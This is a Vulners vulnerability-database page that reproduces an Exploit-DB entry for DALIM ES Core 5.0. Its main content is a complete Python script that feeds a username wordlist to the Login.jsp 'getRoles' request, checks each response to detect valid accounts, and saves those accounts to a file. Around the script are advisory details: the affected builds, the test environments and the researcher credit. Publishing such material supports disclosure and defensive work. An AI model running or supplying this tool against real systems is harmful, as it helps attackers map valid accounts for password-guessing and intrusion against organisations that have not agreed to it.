Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration

🗓️ 09 Aug 2017 00:00:00Reported by LiquidWormType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 38 Views

DALIM SOFTWARE ES Core 5.0 build 7184.1 User Enumeration Weakness - Vulnerability in 'Login.jsp

Code
#!/usr/bin/env python
#
#
# DALIM SOFTWARE ES Core 5.0 build 7184.1 User Enumeration Weakness
#
#
# Vendor: Dalim Software GmbH
# Product web page: https://www.dalim.com
# Affected version: ES/ESPRiT 5.0 (build 7184.1)
#                                 (build 7163.2)
#                                 (build 7163.0)
#                                 (build 7135.0)
#                                 (build 7114.1)
#                                 (build 7114.0)
#                                 (build 7093.1)
#                                 (build 7093.0)
#                                 (build 7072.0)
#                                 (build 7051.3)
#                                 (build 7051.1)
#                                 (build 7030.0)
#                                 (build 7009.0)
#                                 (build 6347.0)
#                                 (build 6326.0)
#                                 (build 6305.1)
#                                 (build 6235.9)
#                                 (build 6172.1)
#                   ES/ESPRiT 4.5 (build 6326.0)
#                                 (build 6144.2)
#                                 (build 5180.2)
#                                 (build 5096.0)
#                                 (build 4314.3)
#                                 (build 4314.0)
#                                 (build 4146.4)
#                                 (build 3308.3)
#                   ES/ESPRiT 4.0 (build 4202.0)
#                                 (build 4132.1)
#                                 (build 2235.0)
#                   ES/ESPRiT 3.0
#
# Summary: ES is the new Enterprise Solution from DALIM SOFTWARE built
# from the successful TWIST, DIALOGUE and MISTRAL product lines. The ES
# Core is the engine that can handle project tracking, JDF device workflow,
# dynamic user interface building, volume management. Each ES installation
# will have different features, depending on the license installed: online
# approval, prepress workflow, project tracking, imposition management...
#
# ES is a collaborative digital asset production and management platform,
# offering services ranging from online approval to web-based production
# environment for all participants of the production cycle, including brand
# owners, agencies, publishers, pre-media, printers and multichannel service
# provider. ES lets users plan, execute and control any aspect of media
# production, regardless of the final use of the output (print, web, ebook,
# movie, and others). It ensures productivity and longterm profitability.
#
# Desc: The weakness is caused due to the 'Login.jsp' script enumerating
# the list of valid usernames when some characters are provided via the
# 'login' parameter.
#
# Tested on: Red Hat Enterprise Linux Server release 7.3 (Maipo)
#            CentOS 7
#            Apache Tomcat/7.0.78
#            Apache Tomcat/7.0.67
#            Apache Tomcat/7.0.42
#            Apache Tomcat/6.0.35
#            Apache-Coyote/1.1
#            Java/1.7.0_80
#            Java/1.6.0_21
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2017-5425
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5425.php
#
#
# 15.06.2017
#


import argparse
import requests
import sys

from colorama import Fore, Back, Style, init

init()

print 'User Enumeration Tool v0.3 for DALiM ES <= v5.0'
parser = argparse.ArgumentParser()
parser.add_argument('-t', help='target IP or hostname', action='store', dest='target')
parser.add_argument('-f', help='username wordlist', action='store', dest='file')

args = parser.parse_args()
if len(sys.argv) != 5:
	parser.print_help()
	sys.exit()

host = args.target
fn = args.file

try:
	users = open(args.file, 'r')
except(IOError):
	print '[!] Error opening \'' +fn+ '\' file.'
	sys.exit()
lines = users.read().splitlines()
print '[*] Loaded %d usernames for testing.\n' % len(open(fn).readlines())
users.close()
results = open('validusers.txt', 'w')

for line in lines:
	try:
		r = requests.post("http://" +host+ "/Esprit/public/Login.jsp", data={'actionRole' : 'getRoles', 'login' : line})
		print '[+] Testing username: ' +Fore.GREEN+line+Fore.RESET
		testingus = r.text[50:72]
		if testingus[19:20] != "\"":
			print '[!] Found ' +Style.BRIGHT+Fore.RED+line+Fore.RESET+Style.RESET_ALL+ ' as valid registered user.'
			results.write('%s\n' % line)
	except:
		print '[!] Error connecting to http://'+host
		sys.exit()

results.close()
print '\n[*] Enumeration completed!'
print '[*] Valid usernames successfully written to \'validusers.txt\' file.\n'

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Aug 2017 00:00Current
7.4High risk
Vulners AI Score7.4
dalim softwarees coreuser enumerationweaknessvulnerabilitylogin.jspusernamesiphostnamewordlistapache tomcatred hat enterprisecentosjavazeroscienceadvisory.
38